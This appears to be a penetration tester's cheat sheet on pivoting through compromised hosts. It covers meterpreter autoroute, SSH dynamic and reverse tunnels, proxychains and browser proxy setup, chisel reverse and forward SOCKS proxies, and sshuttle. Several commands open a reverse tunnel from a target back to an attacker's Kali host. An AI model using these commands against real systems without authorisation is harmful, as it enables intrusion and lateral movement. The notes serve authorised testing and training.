ssh tunnel

NOTE: needs valid SSH creds on box to pivot from.

meterpreter tunnel

# to print existing routes 
autoroute -p

run autoroute [-s IP/CIDR]
[OR]
use post/multi/manage/autoroute
# use auxiliary/server/socks_proxy

ssh tunnel:

Forward tunnel (outgoing)

ssh user@IP -D PORT
# this sets up a tunnel between localhost:TUNNEL-PORT and target
# any requests to localhost:TUNNEL-PORT is routed via target

Reverse tunnel (incoming)

authorized_keys file

from="IP",command="echo 'This account can only be used for Port Forwarding'",no-agent-forwarding,no-X11-forwarding,no-pty <SSH-PUBLIC-key>

Command

# for allowing a connecting to your port from outside (incoming)
ssh -fN -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -R PORT -i <id_rsa> KALI-USER@KALI-IP

# -N: not running commands
# -f: go to background
# UserKnownHostsFile=/dev/null & StrictHostKeyChecking=no will not ask kali password; not safe to enter password on target.

Proxychains

/etc/proxychains4.conf

# add line for socks4/5 proxy 
[socks4|socks5] 127.0.0.1 6900

# comment out proxy_dns to avoid nmap hanging

Now, run any command using $ proxychains4 [command]

proxychains4 for browser

Set up a foxyproxy configuration for browser:

1. Title: proxychains

2. Proxy Type: SOCKS4

3. Proxy IP: localhost

4. Port: 6900

chisel tunnel

Reverse socks proxy

NOTE: configure proxychains using socks5 IP PORT.

# server on kali
chisel server -p 8000 --reverse

# on target
# tunnel using chisel on kali:1080
chisel client KALI_IP:8000 R:socks

Forward socks proxy

# server on target
chisel server -p 8000 --socks5

# on kali
chisel client TARGET_IP:8000 TUNNEL_PORT:socks

sshuttle tunnel

• REQUIREMENTS:

  • Works only on linux targets

  • SSH access to target

  • Python on target (static binary works)

sshuttle -r USER@TARGET_IP [SUBNET/CIDR | -N] [--ssh-cmd "ssh -i KEY"] -x TARGET_IP
# -N: auto identify based on targers routing table
# -x: used to exclude current box from forward all subnet traffic